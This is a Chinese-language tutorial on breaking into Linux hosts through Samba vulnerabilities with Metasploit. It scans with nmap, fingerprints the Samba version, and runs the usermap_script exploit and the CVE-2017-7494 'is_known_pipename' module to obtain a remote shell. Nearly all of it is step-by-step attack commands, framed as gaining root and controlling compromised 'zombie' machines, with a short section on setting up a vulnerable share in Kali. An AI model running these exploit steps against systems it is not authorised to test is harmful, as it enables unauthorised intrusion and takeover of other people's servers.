利用 samba 服务漏洞入侵Linux主机(CVE-2017-7494 与 samba 低版本漏洞利用)
Samba 是在Linux 和 UNIX 系统上实现 SMB协议的一个免费软件,由服务器及客户端程序构成 Samba 服务对应的端口有 139、445等等,本文将简单介绍 metasploit 利用 samba 漏洞入侵进入远程Linux主机。
1、首先要扫描目标主机上开放的端口和服务,用 nmap命令如下: nmap -sS -Pn -A 192.168.0.142 2、发现主机上开放的139,145端口之后,说明该主机有可能存在samba 服务远程溢出漏洞,尝试通过该端口建立一个 meterpreter会话,需要用到 metasploit 3、打开 metasploit 之后需要先判断samba的版本,命令如下: msf> search scanner/samba 这条命令用来查找 samba 相关 exploit参数 4、然后使用如下命令来定义要扫描 samba 的版本所用到的 exploits 参数 msf> use auxiliary/scanner/smb/smb_version msfauxiliary(smb_version) > set RHOSTS 192.168.0.102 这条命令定义你将要扫描 samba 版本的远程主机的IP 地址 5、发现 samba 版本之后,我们需要进一步利用来入侵进入到远程 Linux主机 msf exploit(usermap_script) > set RHOST 192.168.0.102 msf exploit(usermap_script) > exploit 执行完成以上命令如图所示,成功创建了 shell 会话
smb 其他漏洞 Linux smb漏洞(CVE-2017-7494)复现
- 漏洞编号:CVE-2017-7494
- 漏洞等级:严重
- 影响版本:漏洞影响了 Samba 3.5.0 之后的版本,不包含 4.6.4/4.5.10/4.4.14
- 0x01:查看 samba版本打开samba 配置文件添加以下配置。
root@kali:~# samba -V vi /etc/samba/smb.conf
[public]
comment = public
browseable = yes
writeable = yes
path = /tmp/public
public = yes
read only = no
[homes]
comment = Home Directories
browseable = no
- 0X02:Kali Linux 里面创建 Samba 共享目录
创建共享目录 root@kali:~# mkdir /tmp/public 修改读写执行权限 root@kali:~# chmod 777 /tmp/public/ 这是 SambaCry 漏洞利用的前提,必须有一个共享目录,这样攻击者就可以在这个共享目录传递攻击代码并执行,获取到 Root权限并控制肉鸡
- 0x03:Kali Linux 重启/启动 Samba 服务
重启 samba 服务 root@kali:~# /etc/init.d/ samba restart 查看 samba 进程 root@kali:~# ps aux | grep samba 查看 samba 端口状态(采用 139 和 445 端口) root@kali:~# netstat -tnlp samba
- 0x04:更新 MSF 后使用 “exploit/linux/samba/is_known_pipename” 利用模块,设置 rhost 后直接 exploit 即可得到 shell。
**注意!**有的 poc 可能会存在 64位 和 32位之分。
msf5> use exploit/linux/samba/is_known_pipename msf5 exploit(linux/samba/is_known_pipename) > show options msf5 exploit(linux/samba/is_known_pipename) > check msf5 exploit(linux/samba/is_known_pipename) > set rhost xxx / set rport xxx / run / exploit
|